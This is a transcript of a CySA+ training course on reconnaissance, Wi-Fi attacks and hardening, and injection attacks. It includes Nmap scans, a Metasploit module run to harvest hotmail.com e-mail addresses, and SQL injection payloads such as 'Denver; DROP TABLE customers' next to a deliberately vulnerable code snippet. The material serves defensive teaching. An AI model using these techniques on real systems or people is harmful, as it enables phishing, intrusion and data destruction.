Helping protect your company's valuable assets against malicious attacks by outsiders requires a seasoned
understanding of modern-day cyber threats. This 21-video course prepares learners to thwart reconnaissance
and surveillance attacks by hackers and ward off Wi-Fi vulnerabilities, by using the proper tools. First,
examine the wide variety of possible modes of attack—from injection, overflow, and cross-site scripting to
XML (extensible markup language), DoS, address resolution protocol (ARP) poisoning, and password
compromises. Then develop valuable skills in counteracting web browser compromises and agility in the use
of Kali Linux Wi-Fi tools. Learn OWASP’s (Open Web Application Security Project) Top 10 vulnerabilities
and ESAPI (Enterprise Security application programming interface) tools for each one, such as ZAP (Zed
Attack Proxy), to test web application security. While you’re learning, pause to meet the aptly-named John the
Ripper, a free tool for cracking passwords on 15 platforms! The course helps to prepare learners for the CompTIA Cybersecurity Analyst+ (CySA+) CS0-002 certification exam.
Table of Contents
[Video description begins] Topic title: Course Overview. The presenter is Dan Lachance, an IT Trainer /
Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA and Microsoft. Some of my specialties over the years have included
networking, IT security, Cloud Solutions, Linux management and configuration and troubleshooting across a
wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+ certification exam
is designed for IT professionals looking to gain security analyst skills to perform data analysis, to identify
vulnerabilities, threats, and risks to an organization; to configure and use threat detection tools; and to secure and protect an organization's applications and systems.
In this course, we're going to explore how a number of different malicious attacks are executed by hackers.
And some of the tools available for use by security technicians to counter these attacks. I'll start by examining
how reconnaissance is used to gather information for hacking, and how the Metasploit Framework is used to
generate e-mail lists. I'll then explore various WiFi vulnerabilities and attack techniques. I'll show how to
use Kali WiFi tools and how to harden a router.
Next, I'll examine injection, overflow, and Cross-site scripting attacks. And I'll use the BeEF tool to hack a
web browser. I'll continue with an examination of XML attacks, common web application vulnerabilities, and
how to test web application security using the OWASP ZAP tool. I'll then demonstrate the use of the slowhttptest command to run a DoS attack. Lastly, I'll examine password attacks, show the use of the Hydra
password attack tool, and use the John the Ripper tool to crack user passwords.
[Video description begins] Topic title: Reconnaissance. The presenter is Dan Lachance. [Video description
ends]
Reconnaissance is information gathering where an attacker tries to engage with the system to learn more about
it. Enumeration follows. An example of this would be, once we discover that we've got an active host on a network, starting to run a scan against it, such as a port scan, to see which network services are in the listening state on that host. From there we can then determine if any of them are vulnerable, and those vulnerabilities can be exploited to gain access to that host, after which maintaining access can take place. Normally, this takes the form of a malicious user who's managed to gain access creating a backdoor account that looks like it belongs but is really used by the attacker. The hacking process would then end with the attacker trying to cover their tracks, which would perhaps include the removal of any log entries that would indicate the compromise has occurred. IT reconnaissance comes in many different forms. It can be
simply determining which hosts on a network are active. That's usually the starting point. But it can also include discovering IP addresses, perhaps from an organization's network diagrams, or querying DNS records to learn about the names of hosts, which could imply the type of host it is, and also the IP addresses of
those hosts.
We've discussed that port scanning can be used for reconnaissance to learn which services are in a listening
state on a machine. And then, of course, malware could be used to infect hosts on an internal network that
could then perhaps run internal scans and send those results to an attacker outside of a network.
Reconnaissance also includes other physical activities like dumpster diving. Sometimes there can be a treasure
trove of information, where you can learn about an organization for instance by looking through trash cans.
Trash cans could have documentation about procedures or changes to the versions of software or could include
default password information, that type of thing.
Shoulder surfing occurs when someone has the ability to essentially look over someone's back onto what
they're doing on a screen or to see what they're typing into a keypad, which can also be done remotely with
video surveillance. Social media scraping and website scraping means trying to essentially run a dragnet for
useful information through social media feeds or maybe scraping websites looking for e-mail addresses. Now
these things don't have to be done manually. There are plenty of tools that can help automate this type of
scraping for reconnaissance.
There are a lot of tools that can be used for reconnaissance, such as scanning tools. And how those tools are used determines whether they are considered good or bad. There are tools like Nmap, which can be used to determine which hosts are active on a network and which services they are running. There's Nessus, which is actually a
vulnerability scanner that can show you any vulnerabilities that might be present on hosts that were discovered
on a network. You might even have custom scripts, written in PowerShell or, in the Unix and Linux environment, as Bash shell scripts, that enumerate the network looking for some type of vulnerability.
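To make that concrete, and strictly against systems you're authorized to test, typical Nmap reconnaissance looks something like the sketch below; the addresses are placeholders:

  # Host discovery: which hosts on the subnet are active? (ping/ARP sweep)
  sudo nmap -sn 192.168.1.0/24

  # Service enumeration: scan all TCP ports and detect service versions on one host.
  sudo nmap -sV -p- 192.168.1.50

  # A quick look at commonly used UDP services on the same host.
  sudo nmap -sU --top-ports 50 192.168.1.50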
Now how do we mitigate against this? Well, the first one is user training and awareness, such as users knowing
that they shouldn't just click links in unsolicited e-mails that they were not expecting. Firewalls can also be used to limit who can gain access into a network and, in the case of a perimeter firewall, what type of traffic is allowed. And then every individual host should also have a firewall configured accordingly to limit access to that host, or perhaps to hide anything that might be running. Limiting network access is key here, because if an attacker cannot even connect to a network in the first place, it becomes difficult for them to perform any kind of reconnaissance. So maybe using some kind of network authentication protocol to authenticate to the network prior to allowing access could prove helpful. Finally, intrusion detection and prevention
systems can be used to detect any abnormal activity.
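To make the host firewall point concrete, here's a minimal sketch using ufw on a Linux host; the management subnet is a placeholder, and real rule sets will vary by environment:

  # Deny unsolicited inbound traffic by default, allow outbound.
  sudo ufw default deny incoming
  sudo ufw default allow outgoing

  # Allow SSH only from a trusted management subnet (placeholder range).
  sudo ufw allow from 10.1.1.0/24 to any port 22 proto tcp

  # Turn the firewall on and review the rules.
  sudo ufw enable
  sudo ufw status verbose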
In this video, you will learn how to use the Metasploit Framework to generate email lists.
Objectives
[Video description begins] Topic title: E-mail Harvesting. The presenter is Dan Lachance. [Video description
ends]
Kali Linux is a free Linux distribution that you can download and run, and it contains numerous penetration
testing tools. One of the things we're going to look at in this example is e-mail harvesting. It's a reconnaissance
technique used by malicious users to find e-mail addresses that they then might use, for instance, to send
phishing e-mail messages to. So to get started here, I'm going to run the sudo command.
[Video description begins] The following window is open: dlachance@kali:/. The following prompt is
displayed: dlachance@kali:/$. [Video description ends]
This prefix allows me to run commands in a privileged, escalated mode, and I'm going to run msfconsole, which stands for Metasploit Framework console. The Metasploit Framework is part of Kali Linux and it contains a
number of different modules that allow you to execute a number of different types of attacks for testing
purposes. So I'm going to go ahead and press Enter to start that up.
[Video description begins] He executes the following command: sudo msfconsole. The output displays that the
metasploit framework console has started. The prompt changes to msf5 >. He executes the following
command: clear. No output displays and the prompt does not change. [Video description ends]
Now the next thing I would do is I would have to determine the name of the module that I want to load up and
then run. So for example, I could use the search keyword here. And I can search for any of the modules dealing
with gathering, such as gathering e-mail addresses and so on. We can see there are plenty of them here.
[Video description begins] He executes the following command: search gather. The output displays a list of
modules with the word gather. The prompt does not change. He executes the following command: clear. No
output displays and the prompt does not change. [Video description ends]
Now once I've learned the module name, I can actually use it to make it active. So I'm going to use auxiliary/gather/search_email_collector. And I know it's good because it found the module and changed my command prompt.
If I type show info, it will give me some details about how this exploit is to be used and what it's for.
[Video description begins] He executes the following command: show info. The output displays information
about the Search Engine Domain Email Address Collector. The prompt does not change. [Video description
ends]
We even see some options, which alternatively you could also type show options once you've loaded up one of
those modules.
[Video description begins] He executes the following command: clear. No output displays and the prompt does
not change. [Video description ends]
And you can see here, we can set a domain that we want to search through.
[Video description begins] He executes the following command: show options. The output displays module
options. [Video description ends]
So for example, if we're looking for Hotmail e-mail addresses, we could set the DOMAIN item to
hotmail.com. We can specify an output file. Let's go ahead and do this. So I'm going to set the DOMAIN to
hotmail.com. And I'm going to set the output file, let's say, on the root to a file called emails.txt. And then we
simply type in run to run this exploit. Now from here you can exit out, not that you have to, and begin taking a look at the resultant file. So for that, I could run cat and I can take a look at the emails.txt. And
here we can see a number of e-mail addresses that were found using the msfconsole, the Metasploit
Framework console.
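Pulled together, the console session from this demonstration looks roughly like this. The output path matches what was used above, and the option name OUTFILE is assumed from what the module lists under show options:

  # At the shell: start the Metasploit Framework console with elevated privileges.
  sudo msfconsole

  # Inside msfconsole (msf5 >): find and load the e-mail harvesting module.
  search gather
  use auxiliary/gather/search_email_collector
  show info
  show options

  # Configure and run the module.
  set DOMAIN hotmail.com
  set OUTFILE /root/emails.txt
  run
  exit

  # Back at the shell: review the harvested addresses.
  sudo cat /root/emails.txt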
After completing this video, you will be able to list common Wi-Fi network vulnerabilities and mitigation
strategies.
Objectives
[Video description begins] Topic title: Wi-Fi Vulnerabilities. The presenter is Dan Lachance. [Video
description ends]
WiFi networking sends radio transmission signals through the air. And it's convenient because end user
devices don't have to be plugged into a wall jack to gain network access. But with this convenience comes
potential threats. The first thing we have to think about is sticking with default configurations. Now with any
type of IT solution, this is always a bad idea. It makes you more vulnerable, because those default configurations are known by everybody. Think of things like known SSIDs. For example, if you purchase a D-Link wireless router and you leave it with the default SSID, or wireless network name, of D-Link, then that's one less thing attackers would need to figure out if they're trying to determine whether there are any vulnerabilities.
The same goes with firmware versions. You want to make sure that you update the firmware in things like
wireless routers because often those patches address security holes. And of course, using default usernames
and passwords to log in to WiFi devices is a no-no because, again, they are widely known by everybody. Now
back to the known SSID issue, you might say, well what if I have an ASUS wireless router and I call it D-
Link? That's not a bad idea, because then you're at least throwing potential attackers off the trail at least a little
bit. Anything that can prevent knowledge of what exactly is being used and how it's configured helps when it
comes to securing a WiFi environment.
The web admin GUI is built in to some equipment like WiFi routers. It allows you to manage that router's configuration through a web page. If you're doing that, you want to make sure that you're using HTTPS to secure the connection, as opposed to HTTP, to access the web admin GUI. You also want to make sure that you're using the TLS version 1.2 or higher protocol if it's supported. Anything prior to that, meaning TLS 1.1 and earlier, is considered deprecated and vulnerable, and so are all SSL versions, including SSL 3. You shouldn't be using them if you have a choice. Then we have to think about vulnerable devices that might be on the network where our
WiFi devices are connected. Think about having an IoT device like a security camera for home video
surveillance.
Many IoT devices do not treat security as a high priority. And so they'll ship with some default settings that might even be baked into the firmware and can't be changed or updated. You want to make sure that those types of devices, number one, aren't even being used if possible. But if they must be, then they're on an isolated
network. All it takes to compromise an entire network is one compromised device. So that's why network
segregation and controlling connectivity to networks with vulnerable devices, is an important hardening factor
with WiFi networking. Look out for weak encryption implementations. An example of this would be WEP.
WEP, or the wired equivalent privacy encryption standard, has long been considered deprecated for WiFi
networking. And there's a newer WPA version 3 protocol coming out that we should try to adhere to, but that
means you have to have equipment that supports that standard. Otherwise you might use WPA2, WiFi
protected access version 2 to secure your network in terms of encryption.
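One quick way to audit the web admin GUI point from earlier is to enumerate which SSL/TLS versions and cipher suites a router's HTTPS page will actually negotiate. A sketch, assuming Nmap is available and using a placeholder address for the router:

  # List the SSL/TLS protocol versions and ciphers offered on the admin interface.
  sudo nmap --script ssl-enum-ciphers -p 443 192.168.1.1

Anything listed under SSLv3 or TLSv1.0/1.1 in the output is a sign the device's firmware or configuration needs attention.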
[Video description begins] Physical Security and Wi-Fi Vulnerabilities. [Video description ends]
The other thing is physical security. Imagine that we've got a lobby or a public WiFi hotspot location. Now
what an attacker or malicious user might do is physically bring an access point with them and plug it in to a
location where it can't be detected, such as behind a plant in the lobby. Now even if that lobby normally doesn't
support WiFi, if there's a network jack that's active behind the plant on the wall, an access point could be
plugged in to allow the attacker to make a WiFi connection to that network where otherwise that might not be
possible. And then they could capture the traffic on the WiFi network and by extension on the wired network.
So the solution here is to ensure that network jacks, such as the one behind our fictitious plant in the lobby, are not left active unless they need to be.
Other things to think about, infected connected devices. If malware infections are on the network on a device
that legitimately should be on the network, it could compromise the network. The malware might even scan the
network looking for the use of SSL on a wireless router or web admin GUI and try to take advantage of, or exploit, that weakness. Then there's network access over distances. As we saw in our previous example, on a network that doesn't have wireless access, if a rogue access point can somehow be plugged into a wired jack on that network, it could allow access to that network, even from outside the perimeter of the building or of the property.
Using outdated access point and wireless router firmware is always a problem. When updates are available,
make sure they are applied. That means you have to know when they're available, so do a bit of research.
Inventory your wireless equipment, subscribe to mailing lists, so that you are made aware when updates are
available.
[Video description begins] Access Point abbreviates to AP. [Video description ends]
Then there's users plugging in access points and routers. Now we saw that we could have a malicious user do that, and we know what the scary part of that is. We also want to make sure users don't just bring wireless routers to work for convenience, so they can connect to WiFi in the lunchroom if WiFi isn't already supported by the organization. This means detecting additional devices on the network that are normally not there, and treating that as a risk, for example with an intrusion detection type of system to detect rogue devices on the network.
After completing this video, you will be able to describe common Wi-Fi attack techniques.
Objectives
[Video description begins] Topic title: Wi-Fi Attacks. The presenter is Dan Lachance. [Video description ends]
Now there are many different types of WiFi attacks. It could be as simple as capturing and analyzing WiFi
traffic. A malicious user might set up a fake WiFi hotspot. This can even be done on a smartphone these days
for tethering purposes to fool people into connecting to that WiFi hotspot. Therefore, all the traffic goes
through the malicious user device. And they can capture it all and analyze it. Now of course, if it's strongly
encrypted they might not be able to do very much with it. But otherwise, they may. There are also tools that let
you crack WEP, WPA, and WPA2 wireless encryption. Tools like Aircrack-ng or Reaver or Hashcat. These
are tools that allow us to learn about the WiFi encryption protocols that are in use and, in some cases, exploit weaknesses in them.
There's also the possibility of attackers using spoofed MAC addresses. The MAC address is the 48-bit
hexadecimal address that's assigned to your network interface card, including a WiFi card. And so if you have
specified only certain MACs are allowed to connect to the WiFi network, that is easily spoofed once the
attacker knows of valid MAC addresses. There are also freely available tools where attackers can discover
non-broadcasting SSIDs. You can configure your wireless router or access point to not broadcast its presence.
However, it still has to be sending radio signals through the air to allow connectivity. And so that means there
are tools that can still discover non-broadcasting wireless networks.
So countermeasures. First of all, limit signal range. Some wireless routers and access points will let you
specify the signal strength, which in turn equates to how far away one can be and still make a connection to the
wireless network. MAC address filtering to specify MAC addresses that, for example, are allowed to connect.
And we know that those can be spoofed, but it's still a good security measure in addition to other items.
Updating the firmware. Maybe disabling remote access from the public network. This is often for remote
management purposes. Remote management should only ever be allowed from inside the network, not outside.
Using only HTTPS with TLS version 1.2 or higher. Perhaps using IEEE 802.1X network access control, or NAC, devices, which require authentication prior to allowing network access, even through an authentication server that supports RADIUS or TACACS+.
You can use a generic SSID that doesn't equate to the actual model of the wireless router or access point you're
using. The last thing you want to do if you're setting up a WiFi network for a bank boardroom is call it, bank A
boardroom. We don't want to do that because it indicates to potential attackers what it really is. We can disable
SSID broadcast even though it still can be detected. That'll keep a lot of the honest people out. We should have
an inventory of which WiFi devices should be on the network. And their details such as firmware versions and
their configurations. We can enable isolation mode on a wireless network. What this does is it ensures that
each WiFi device has its own virtual network connection to the WiFi router. This would prevent an attacker
connected to the WiFi network from capturing network traffic and seeing everybody's WiFi traffic.
Kind of like you would in a wired network using a hub, as opposed to, let's say, an Ethernet switch. You
should disable unused switch ports. And that kind of leads back to our example of a malicious user plugging in
a rogue wireless access point behind a plant in the lobby, where there's a network jack that still works.
Changing default items like the username and the password. And then automating log monitoring and alerts.
Often you can configure enterprise class WiFi devices to forward log entries to a centralized reporting system,
where it can look for any indications of suspicious activity. And then alert administrators about that. And then
there is as always user training and awareness. So that users have a sense of not clicking on things like
unexpected e-mail messages with file attachments or links, which could compromise their device, which in
turn could compromise other devices on that network, whether it's a WiFi network or not.
[Video description begins] WPA3 Wi-Fi Devices. A screenshot of the wi-fi.org website is displayed. [Video
description ends]
Now one thing to consider nowadays is using WPA3 types of WiFi devices. Here I've gone to the wi-fi.org
website where we can filter for WPA3 certified hardware. And essentially, this addresses some of the security
problems that are known with WPA2. Now, bear in mind WPA2 is a standard that's been around since 2004.
There's been plenty of time for attackers to find out if there are any weaknesses in WPA2. And there are ways
to crack WPA2-encrypted WiFi networks.
6. Video: Wi-Fi Tools (it_cscysa20_03_enus_06)
[Video description begins] Topic title: Wi-Fi Tools. The presenter is Dan Lachance. [Video description ends]
[Video description begins] The following window is open: root@kali:~. The following prompt is displayed:
root@kali:~#. [Video description ends]
I'll start with iw dev. And I can see interface wlan0 is my wireless card in Linux.
[Video description begins] He executes the following command: iw dev. The output displays that the interface
is wlan0. The prompt does not change. [Video description ends]
So I'm going to run iwlist wlan0 scan and I'm going to pipe that to the line filtering grep command. I only want
to see SSIDs or names of wireless networks.
[Video description begins] He executes the following command: iwlist wlan0 scan | grep SSID. The output
displays a list of wireless networks. The prompt does not change. [Video description ends]
I can now see a list of wireless networks. The first one looks like a bunch of Xs and 0s because it's a hidden
WiFi network. But I'm going to use the wpa_passphrase command here in Linux. And I'm going to specify a
passphrase I want to use to connect to the linksys WiFi network seen listed up above. So I'll put in linksys
space and then the password for that network, which I know. And then what I'm going to do is use the output
redirection or greater than symbol to dump that into a file, which I'm going to call linksys.conf.
[Video description begins] He executes the following command: wpa_passphrase linksys urnotFam0us >
linksys.conf. No output displays and the prompt does not change. [Video description ends]
And now I'm just going to view the contents of that file using the cat command. And we can see the SSID, we
can see the pre-shared key or psk in its text form.
[Video description begins] He executes the following command: cat linksys.conf. The output displays the
contents of the linksys.conf file. The prompt does not change. [Video description ends]
And also in its other form, which will be used to make an authenticated connection to the WiFi network.
[Video description begins] He executes the following command: clear. No output displays and the prompt does
not change. [Video description ends]
So I'm going to use the wpa_supplicant command and I'm going to use a -D for driver. And I'm going to
specify here a driver name for wireless extension. So I'm going to specify w-e-x-t, no space between the
parameter and the value, -i for interface. And the interface that we saw initially was called wlan0, so I'll
specify that. Then I'll specify -c and linksys.conf for our config file, where we've got the name of the wireless
network and the pre-shared key.
[Video description begins] He executes the following command: wpa_supplicant -Dwext -iwlan0 -
clinksys.conf. No output displays and the prompt does not change. [Video description ends]
So now if I do iwconfig, we can see that I'm connected on wlan0 to the linksys WiFi network.
[Video description begins] He executes the following command: iwconfig. The output displays information of
the wireless extensions for eth0, wlan0, and lo. The prompt does not change. [Video description ends]
So the next thing I need is to get a valid IP configuration. So I'm going to run the dhclient command in Linux
for interface wlan0.
[Video description begins] He executes the following command: dhclient wlan0. No output displays and the
prompt does not change. [Video description ends]
And after I've done that, if I type ifconfig and look at the wlan0 network interface at the bottom, I can see I've
got a valid IP.
[Video description begins] He executes the following command: ifconfig. The output displays that the wlan0
interface has a valid IP . The prompt does not change. [Video description ends]
So if I try to ping something, say on the Internet, like google.com, I get a reply.
[Video description begins] He executes the following command: ping www.google.com. The output displays
the ping statistics for www.google.com. The prompt does not change. [Video description ends]
[Video description begins] Topic title: Wi-Fi Hardening. The presenter is Dan Lachance. [Video description
ends]
Part of hardening a WiFi environment is the settings that you apply to your wireless access points and wireless
routers. Here I've got a D-Link emulator for a wireless router. And there are a number of things that we can do to
harden this configuration.
The first thing I'll take a look at here is that I'm under the SETUP area. I'm going to click WIRELESS
SETTINGS.
[Video description begins] He selects the WIRELESS SETTINGS option in the navigation pane and its
corresponding page opens in the content pane. The WIRELESS SETTINGS page includes two subsections:
WIRELESS NETWORK SETTINGS and WIRELESS SECURITY MODE. It also includes a button labeled
"Save Settings". The WIRELESS NETWORK SETTINGS subsection includes a text box labeled "Wireless
Network Name" and a checkbox labeled "Enable Hidden Wireless". The WIRELESS SECURITY MODE
subsection contains a drop-down list box labeled "Security Mode". [Video description ends]
And over on the right, I have a number of things I see I can change. Notice that the default Wireless Network
Name, the SSID, is set to dlink. Well, because this is a D-Link wireless router, that's a bad idea. So what I'm
going to do is set this as just some other name. Maybe I'll call it apollo, which doesn't really imply the
company name, the location geographically, the model, the make, or anything.
[Video description begins] He types the following text in the "Wireless Network Name" text box:
apollo. [Video description ends]
Down below, I can also Enable Hidden Wireless. In other words, hiding the broadcast of the SSID details.
[Video description begins] He selects the "Enable Hidden Wireless" checkbox. [Video description ends]
Now technically, we still have radio signals going through the air. It's just that the frame that displays the
wireless name for the network is being suppressed. So there are freely available tools that malicious users
might use for reconnaissance to still discover that there are hidden wireless networks. But still, this is a great
way to keep basic, wannabe hackers out, I guess you could say. Scrolling down, we can also see the
WIRELESS SECURITY MODE. Now the model of the wireless router you have, and also how up to date its firmware is, will determine which options show up here. You should try to stay away from WEP,
wired equivalent privacy, and WPA. Most modern wireless routers will support WPA2, and in some cases,
even the newer WPA3.
[Video description begins] He selects the following option in the "Security Mode" drop-down list box: Enable
WPA2 Wireless Security (enhanced). A new subsection called "WPA2" appears. It includes a drop-down list
box labeled "Personal / Enterprise". [Video description ends]
When you choose WPA2, for example, you can determine if you want to use personal WPA2 where you
specify a passphrase and confirm it. Any connecting WiFi clients would have to know the passphrase. Or you
could choose Enterprise, where you're using a centralized authentication server, such as a RADIUS or
TACACS+ server. This means then that even if this wireless router were to be compromised, user accounts
would not be. Because they're not stored here, there's no pass phrase here necessarily. It's really just going to
authenticate users to the RADIUS server where they must have a valid account. So that's something we can do
but there are some other interesting things here as well. Now I would click Save Settings normally to save
those configuration changes. If I go to ADVANCED, the other thing we can take a look at here is the transmit
power.
[Video description begins] He selects the ADVANCED option in the first part and its corresponding page
opens in the content pane. The content pane is further divided into two sections: navigation pane and content
pane. The navigation pane includes options called "VIRTUAL SERVER", "ADVANCED NETWORK", and
"ADVANCED WIRELESS". The VIRTUAL SERVER option is selected and its corresponding page is open in
the content pane. [Video description ends]
Now to do this, let's take a look, let's say, at ADVANCED WIRELESS. The Transmit Power here is set to
100%.
[Video description begins] He selects the ADVANCED WIRELESS option in the navigation pane and its
corresponding page opens in the content pane. The ADVANCED WIRELESS page includes a subsection called
"ADVANCED WIRELESS SETTINGS". It includes a drop-down list box labeled "Transmit Power". [Video
description ends]
Now, if we know that we don't need that much power because it's emanating WiFi signals much too far beyond, let's say, our building's four walls, then we might reduce it to 50%. And naturally this would take some testing. The idea with the Transmit Power is we don't want to send our WiFi signal so far away from our physical location that people who aren't even in the office, for example, would still be able to attempt to
connect. So that's something else that we might consider. If I go to the TOOLS menu at the top, then we can
take a look at the ADMIN section. And this is where you most certainly should change the administrator name
and password.
[Video description begins] He selects the TOOLS option in the first part and its corresponding page opens in
the content pane. The content pane is further divided into two sections: navigation pane and content pane. The
navigation pane includes options called "ADMIN", "FIRMWARE", and "TIME". The ADMIN option is
selected and its corresponding page is open in the content pane. It includes two subsections called
"ADMINISTRATOR" and "USER". [Video description ends]
It says the default name is ADMIN, and we've got a default user account called USER. We want to change all of these default settings because default credentials are easily obtainable by anyone on the Internet who cares to look them up. And so we don't want that made available. Now they would have to know the model of the wireless
router that we're using. That's why changing the SSID is not a bad idea. At least it changes the manufacturer
name. Some of the other things that we might be interested in doing, let's say, is going to under ADVANCED.
[Video description begins] He selects the ADVANCED option in the first part and its corresponding page
opens in the content pane. He selects the "ADVANCED NETWORK" option in the navigation pane and its
corresponding page opens in the content pane. It includes a subsection called "UPNP". This section contains
a check box labeled "Enable UPnP". [Video description ends]
And what I'm going to do is go under ADVANCED NETWORK. There's some things here you might want to
disable like Universal Plug and Play, UPnP. Which is enabled here by default, so I can just uncheck it. So
Universal Plug and Play allows any apps on your network to forward ports. And so if you've got a malware
infected device, then what that could do is request your router to allow port forwarding. And the problem with
this is it could expose computers on the inside of your network out to the Internet. So that's why I'm disabling
UPnP, Universal Plug and Play. So we have a number of options then here that we can reconfigure to harden
this item. The last thing here is just to take note of the Firmware Version listed here in the upper-right. Now it's
always important to apply the latest firmware updates to equipment such as wireless routers. And so if we go
to TOOLS, we could then go to FIRMWARE. Again, we can see the version number listed here, and the date.
[Video description begins] He selects the TOOLS option in the first part and its corresponding page opens in
the content pane. He selects the "FIRMWARE" option in the navigation pane and its corresponding page
opens in the content pane. It includes a subsection labeled "CURRENT FIRMWARE INFO". It includes the
following details: Current Firmware Version: 1.04 and Firmware Date: May 22, 2007. Under this text there is
a text box and a button labeled "Browse". [Video description ends]
And we could click the Browse button if we've downloaded the latest firmware update that we want applied to
this device.
After completing this video, you will be able to recognize how injection attacks can lead to the disclosure of
sensitive data.
Objectives
[Video description begins] Topic title: Injection Attacks. The presenter is Dan Lachance . [Video description
ends]
Injection attacks pose a threat against web applications. It's a general category of malicious activity that really
deals with malicious input provided by a malicious user in one way or another, that gets accepted and
processed by an application. So the key is to make sure the application doesn't process the injected malicious
content. Now this can result in the app behaving erratically. It could cause the app to crash or disclose sensitive information, or in some cases even allow privileged remote command execution. There are a couple
of different types of injection attacks,
[Video description begins] Common Injection Attack Types. [Video description ends]
such as a cross-site scripting or XSS attack, which itself has subcategories of its own types. Now, essentially
cross-site scripting means an attacker gets executable JavaScript code in a webpage that they somehow trick a
user into viewing. And so when the user views that webpage, the JavaScript code executes in their browser in
the end. And could disclose sensitive information like cookies or session information within the web browser.
There are host header injection types of attacks. A host header is sent when clients make requests to a web app, because you could have a single web server on one IP address hosting multiple web apps. Well, then, how do we distinguish one from the other? The host header specifies the DNS domain name of the app. But there have been known problems with this. Basically, it really depends on how the host header passed to the web application is parsed and processed by the back-end code. And so in some cases that could result in password reset messages being sent to whatever domain is specified in the host header, which could allow an attacker to potentially reset a valid user's password so that the attacker would know it. There's
OS command injection. As the name implies, it allows the execution of operating system commands depending
on the back end OS hosting the web app. This is like a privilege escalation type of attack, and it can result from
a number of deficiencies on the web app. And then there are SQL injection attacks against databases. Let's take
a look at SQL injection attacks. So let's say that we've got a SQL database that a front-end web application is
communicating with. So we might have a form available on the front-end web app that allows users to specify
query information for the back-end database. So if the attacker enters something that always evaluates to true, like 123 OR 1=1, then that could be a problem. A SQL statement might then be constructed based on what's in the code and also on what the user enters. So we might end up with a statement that looks something like this: SELECT * FROM users WHERE userid = 123 OR 1=1. There may or may not be a user ID with the value 123, but 1=1 is always true. And if the application isn't properly checking that input from the user, if it's not properly input validated, then it could return every row in the users table. As another example, let's look at some more vulnerable SQL injection attack code.
[Video description begins] A code snippet is displayed. The code reads, code starts: --VULNERABLE String query = "SELECT * FROM customers WHERE city = '" + input + "'"; Statement s = connection.createStatement(); ResultSet rs = statement.executeQuery(query); --NOT VULNERABLE PreparedStatement s = connection.prepareStatement("SELECT * FROM customers WHERE city = ?"); s.setString(1, input); ResultSet rs = statement.executeQuery();. Code ends. [Video description ends]
So here we've got a string variable called query and it contains a SELECT statement. So I'll select all from
customers where city equals, and then we're asking for user input, we've got an input variable. Now, this can
be problematic because from this we could then create a statement, and then from there we could execute the
query. And then have the returned records in a result set variable, in this case called rs. Now, the problem
here is that what if the input variable does include something like a city name? Let's say Denver. But it also
includes a SQL command. So maybe the input supplied by the user is Denver; DROP TABLE customers. Dropping a table means deleting it. That would be a problem if the code isn't properly
checking the input variable for those types of things. So as an example, doing the same type of thing, but
where it's not as vulnerable, could be to use a SQL prepared statement. Where what we're doing here is
running our SELECT statement, but we're specifying a question mark instead of just a variable, such as input.
And so the question mark is essentially just a parameter which can be filled in. Now the next thing we can do
is call upon the setString method, where the 1 is really just an integer value that denotes the parameter number. Then we pass in our input variable as the value, and we run our query that way. So the
difference here is that we are filtering what the user is entering. In other words, all they can specify here is a
city name, and that's it. So we are limiting city to being a parameter value. As opposed to allowing the user to
potentially enter something that becomes a part of the SQL command.
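To make the prepared-statement idea concrete outside of that Java-style snippet, here is a minimal, hypothetical sketch in C using the SQLite C API. The customers table and city column mirror the example above; the database file name, and the choice of SQLite at all, are just assumptions for illustration and not part of the original demo.

#include <stdio.h>
#include <sqlite3.h>

/* Look up customers by city using a parameterized (prepared) statement.
   The user-supplied value is bound as data, so it can never become part
   of the SQL command itself. */
int find_customers_by_city(const char *user_input)
{
    sqlite3 *db = NULL;
    sqlite3_stmt *stmt = NULL;

    if (sqlite3_open("shop.db", &db) != SQLITE_OK) {   /* hypothetical database file */
        fprintf(stderr, "open failed: %s\n", sqlite3_errmsg(db));
        sqlite3_close(db);
        return 1;
    }

    /* The ? placeholder is a parameter slot, not SQL text. */
    if (sqlite3_prepare_v2(db, "SELECT * FROM customers WHERE city = ?;",
                           -1, &stmt, NULL) != SQLITE_OK) {
        fprintf(stderr, "prepare failed: %s\n", sqlite3_errmsg(db));
        sqlite3_close(db);
        return 1;
    }

    /* Bind the untrusted input to parameter 1. Even something like
       "Denver; DROP TABLE customers" is treated as a literal city name. */
    sqlite3_bind_text(stmt, 1, user_input, -1, SQLITE_TRANSIENT);

    while (sqlite3_step(stmt) == SQLITE_ROW) {
        printf("%s\n", (const char *)sqlite3_column_text(stmt, 0));
    }

    sqlite3_finalize(stmt);
    sqlite3_close(db);
    return 0;
}

The design point is the same as with the Java PreparedStatement: the query text stays fixed, and untrusted input can only ever fill the parameter slot.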
So what can be done about injection attacks? How can we mitigate or counter them? One way is to use the OWASP ESAPI. ESAPI stands for Enterprise Security API, and OWASP is the Open Web Application Security Project. The OWASP ESAPI is a free, open source library that web app programmers can call upon to help harden web apps against vulnerabilities like injections. It essentially lets them secure their code by making calls to this library instead of building everything themselves from scratch to validate input and so on. There's also whitelisting input sources, and there's escaping special characters. These are all attack mitigations. Escaping a special character means taking away the meaning of a character that might otherwise have a special meaning, such as in a query statement, maybe as a wildcard. If we take away those special meanings, we reduce the potential for an injection attack, in this case one that discloses sensitive information from a database. Another way to mitigate injection attacks is to make sure the code is written securely. This means having a periodic code review, ideally by other programmers, by peers. That can be referred to as static code analysis, because the code is being examined rather than executed. Use parameterized database queries. We saw that with SQL prepared statements, where we referenced the question mark symbol for the parameter value. That way, we can prevent anything submitted by the user from becoming part of the SQL command. Then there are secure coding guidelines. Part of this would be using tools like the OWASP ESAPI, but it's also important that developers have secure coding training.
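As a companion to parameterized queries, here is a small, illustrative sketch of whitelist-style input validation in C. The rule it enforces, letters, spaces, and hyphens only, up to 63 characters, is an assumed policy for a city-name field, not a universal standard.

#include <ctype.h>
#include <string.h>

/* Return 1 if the input looks like a plausible city name under our assumed
   whitelist policy, 0 otherwise. Quotes, semicolons, and other special
   characters are simply rejected rather than escaped. */
int is_valid_city(const char *input)
{
    size_t len = strlen(input);
    if (len == 0 || len > 63) {
        return 0;
    }
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)input[i];
        if (!isalpha(c) && c != ' ' && c != '-') {
            return 0;
        }
    }
    return 1;
}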
After completing this video, you will be able to recall how overflow attacks work.
Objectives
[Video description begins] Topic title: Overflow Attacks. The presenter is Dan Lachance. [Video description
ends]
Overflow attacks have been an issue with web app security, and with application security in general, for decades.
